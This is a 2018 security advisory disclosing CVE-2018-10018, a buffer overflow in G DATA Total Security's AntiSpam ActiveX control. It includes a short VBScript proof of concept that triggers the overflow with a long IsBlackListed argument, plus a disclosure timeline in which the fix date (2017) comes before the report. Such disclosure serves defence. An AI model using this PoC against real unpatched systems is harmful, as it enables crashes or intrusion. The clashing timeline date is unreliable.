G DATA Total Security - Activex Buffer Overflow

Related Vulnerabilities: CVE-2018-10018  
Publish Date: 13 Jul 2018
=====[ Tempest Security Intelligence - ADV-24/2018 ]===

G DATA TOTAL SECURITY v25.4.0.3 Activex Buffer Overflow
Author: Filipe Xavier Oliveira
Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]=====================================================

* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References

=====[ Overview]==============================================================

* System affected : G DATA TOTAL SECURITY [1].
* Software Version : (other versions may also be affected).
* Impact : A user may be affected by opening a malicious black list
email in the antispam filter,

=====[ Detailed description]==================================================
The GDASPAMLib.AntiSpam ActiveX control ASK\GDASpam.dll in G DATA Total
Security has a buffer overflow via a long IsBlackListed argument.
Through a long input in a member of class called Antispam, isblackedlist
class is vulnerable a buffer overflow.

A poc that causes a buffer overflow :

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:B9D1548D-4339-485A-ABA2-F9F9C1CBF8AC' id='target' />
<script language='vbscript'>

'for debugging/custom prolog
targetFile = "C:\Program Files\G DATA\TotalSecurity\ASK\GDASpam.dll"
prototype = "Function IsBlackListed ( ByVal strIP As String ) As Long"
memberName = "IsBlackListed"
progid = "GDASPAMLib.AntiSpam"
argCount = 1

arg1=String(14356, "A")

target.IsBlackListed arg1


=====[ Timeline of disclosure]===============================================

04/10/2018 - Vulnerability reported.
04/17/2018 - The vendor will fix the vulnerability.
05/24/2017 - Vulnerability fixed.

07/12/2018 - CVE assigned [1]

=====[ Thanks & Acknowledgements]============================================

- Tempest Security Intelligence / Tempest's Pentest Team [3]

=====[ References]===========================================================

[1] https://www.gdatasoftware.com/

[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10018

[3] http://www.tempest.com.br 

=====[ EOF]====================================================================